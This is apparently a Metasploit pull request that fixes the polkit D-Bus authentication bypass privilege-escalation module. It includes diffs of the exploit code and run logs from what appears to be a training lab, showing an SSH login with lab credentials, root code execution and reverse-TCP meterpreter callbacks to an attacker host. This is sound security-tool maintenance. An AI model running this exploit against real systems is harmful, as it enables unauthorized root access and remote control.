### PR TITLE
Fixes #17227 - polkit_dbus_auth_bypass module when run from a command…

### DIFF
--- a/lib/msf/core/session/provider/single_command_shell.rb
+++ b/lib/msf/core/session/provider/single_command_shell.rb
@@ -137,7 +137,12 @@ module SingleCommandShell
 
     # Send the command to the session's stdin.
     delimiter = "echo #{token}"
-    shell_data = cmd + "#{command_separator}#{delimiter}#{command_termination}"
+    if cmd.strip.end_with?(command_separator)
+      # This command already ends with a delimiter - don't need to add another one
+      shell_data = cmd + "#{delimiter}#{command_termination}"
+    else
+      shell_data = cmd + "#{command_separator}#{delimiter}#{command_termination}"
+    end
     unless @is_echo_shell
       shell_data = "#{delimiter}#{command_separator}#{shell_data}"
     end

--- a/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
+++ b/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb
@@ -310,7 +310,7 @@ class MetasploitModule < Msf::Exploit::Local
           echo \"success\";
           break;
         fi;
-      done;
+      done
     SCRIPT
                .gsub(/\s+/, ' ')) =~ /success/
   end
@@ -361,7 +361,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def execute_payload(fname)
-    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
+    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -Sb #{fname}\"")
   end
 
   def exploit
@@ -400,6 +400,15 @@ class MetasploitModule < Msf::Exploit::Local
       print_good("Successfully removed #{datastore['USERNAME']}")
     else
       print_warning("Unable to remove user: #{datastore['USERNAME']}, created during the running of this module")
+    end
+  end
+
+  def on_new_session(client)
+    # Because we deleted the user directory, a meterp shell will be unusable until we chdir somewhere that exists
+    # So let's just use the WritableDir that must exist, given its use earlier
+    if !session.nil? && (client.type == 'meterpreter')
+      client.core.use('stdapi')
+      client.fs.dir.chdir(datastore['WritableDir'])
     end
   end
 end


### PR DESCRIPTION
This PR fixes #17227. There turned out to be a few issues here, besides the initially reported symptom.

The initial root cause was a syntax error in one of the polkit module's commands: one of the exploitation commands ended with a semicolon. In a meterpreter payload, that's fine; but in a command shell, when the tokenised echo shell behaviour added an extra semicolon (e.g. `some_real_command; ; echo the_token`), you end up with two semicolons next to each other with no command in between. In bash, this is a syntax error. In addition, because our SSH sessions are created PTY-less, this error terminates the bash process, and thus the SSH connection (you see the same behaviour if you SSH using the actual `ssh` command with the `-T` flag, and then type `; ;`).

The solution to this initial issue is to remove that semicolon - doing so fixes the issue: adds the user, gets the privesc working, and gets a shell. I've also changed the command shell behaviour to avoid adding an extra delimiter if there's already one there.

So that fixes the initial issue. However, when the module continues, it then fails to remove the added user. This is because it launches the new (sudo'd) shell synchronously, which blocks the initial shell, and prevents the next command (delete user) from running. This isn't an issue when running the exploit from a meterpreter shell, I guess because it channelises calls to `cmd_exec`. But in a single-channel SSH shell, the sudo'd process is blocking input to the shell, so the deletion fails. The solution to this is to run the sudo'd shell backgrounded, with `-b`. This deletion now works in both a Metasploit shell and a command shell.

One other quirk of this module is that, after the exploit succeeds (at least in this environment), the new shell ends up with its current working directory in the deleted user's home directory... which no longer exists. That results in the meterpreter shell failing on almost any command, with a not-entirely-clear error message:

```
meterpreter > getuid
Server username: root
meterpreter > pwd
[-] stdapi_fs_getwd: Operation failed: 2
meterpreter > ls
[-] stdapi_fs_getwd: Operation failed: 2
meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: 2
```

So I added a chdir into the directory that was used for the exploit, so that it's immediately usable. That's for meterp shells only - new command shells still end up in the wrong directory - but they're at least usable.

```
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > run username=tryhackme password=TryHackMe123! rhost=10.10.37.80

[*] 10.10.37.80:22 - Starting bruteforce
[+] 10.10.37.80:22 - Success: 'tryhackme:TryHackMe123!' 'uid=1001(tryhackme) gid=1001(tryhackme) groups=1001(tryhackme) Linux polkit 5.8.0-1035-aws #37~20.04.1-Ubuntu SMP Tue Jun 1 09:54:15 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux '
[*] SSH session 1 opened (10.18.52.246:42739 -> 10.10.37.80:22) at 2022-11-25 15:05:04 +1100
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/polkit_dbus_auth_bypass
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run iterations=100 lhost=10.18.52.246 session=1 username=fred

[*] Started reverse TCP handler on 10.18.52.246:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking for exploitability via attempt
[+] The target is vulnerable. The polkit framework instance is vulnerable.
[*] Attempting to create user fred
[+] User fred created with UID 1000
[*] Attempting to set the password of the newly created user, fred, to: 3Vmbae7s
[+] Obtained code execution as root!
[*] Writing '/tmp/NrmZC' (207 bytes) ...
[*] Attempting to remove the user added: 
[*] Sending stage (1017704 bytes) to 10.10.37.80
[+] Successfully removed fred
[*] Meterpreter session 2 opened (10.18.52.246:4444 -> 10.10.37.80:43438) at 2022-11-25 15:05:38 +1100

meterpreter > sysinfo
Computer     : 10.10.37.80
OS           : Ubuntu 20.04 (Linux 5.8.0-1035-aws)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

Now starting with a meterp session (to make sure that still works):

```
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.18.52.246:4433 
[*] Sending stage (1017704 bytes) to 10.10.37.80
[*] Command stager progress: 100.00% (773/773 bytes)
msf6 exploit(linux/local/polkit_dbus_auth_bypass) > [*] Meterpreter session 5 opened (10.18.52.246:4433 -> 10.10.37.80:59440) at 2022-11-25 15:07:10 +1100

[*] Stopping exploit/multi/handler

msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run iterations=100 lhost=10.18.52.246 session=5 username=fred

[*] Started reverse TCP handler on 10.18.52.246:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking for exploitability via attempt
[+] The target is vulnerable. The polkit framework instance is vulnerable.
[*] Attempting to create user fred
[+] User fred created with UID 1000
[*] Attempting to set the password of the newly created user, fred, to: 3Vmbae7s
[+] Obtained code execution as root!
[*] Writing '/tmp/VePHo' (207 bytes) ...
[*] Sending stage (1017704 bytes) to 10.10.37.80
[*] Attempting to remove the user added: 
[+] Successfully removed fred
[*] Meterpreter session 6 opened (10.18.52.246:4444 -> 10.10.37.80:43500) at 2022-11-25 15:07:54 +1100

meterpreter > sysinfo
Computer     : 10.10.37.80
OS           : Ubuntu 20.04 (Linux 5.8.0-1035-aws)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```